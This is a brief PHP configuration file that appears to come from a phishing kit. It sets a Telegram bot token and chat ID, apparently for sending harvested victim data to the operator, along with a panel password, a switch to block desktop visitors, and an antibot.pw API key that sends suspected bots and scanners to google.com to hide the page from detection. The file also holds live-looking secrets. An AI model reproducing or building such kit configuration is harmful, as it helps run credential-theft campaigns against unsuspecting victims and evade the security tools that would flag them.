<?php 

//Have a telegram bot? put the tokens here :D
$bot_token = "8921370992:AAFXL2SNELTjgsqv_ydRPzFYpOjlvEDbkGw";
$chat_ids = array("8962499720");

// to block pc - on | off
$block_pc = "off";

// PASSWORD FOR PANEL
$password = "Nepal.123";

//Generate Random Numbers
$str = rand();
$id = md5($str);
$ue = md5($str + 8); 

//antibot.pw
if (!defined('ANTIBOTPW_API')) {
    define('ANTIBOTPW_API', '81556fe7c1fbe673fdd8db7f67002f1b'); // Your Antibot API key
}

//$apiKey = '81556fe7c1fbe673fdd8db7f67002f1b'; // Your Antibot API key
$botRedirectUrl = 'https://google.com'; // URL to redirect if the visitor is identified as a bot
//$realRedirectUrl = ''; // URL to redirect if the visitor is not identified as a bot

//$antibot = new Antibot($apiKey, $botRedirectUrl, "");
//$antibot->check();

 
?>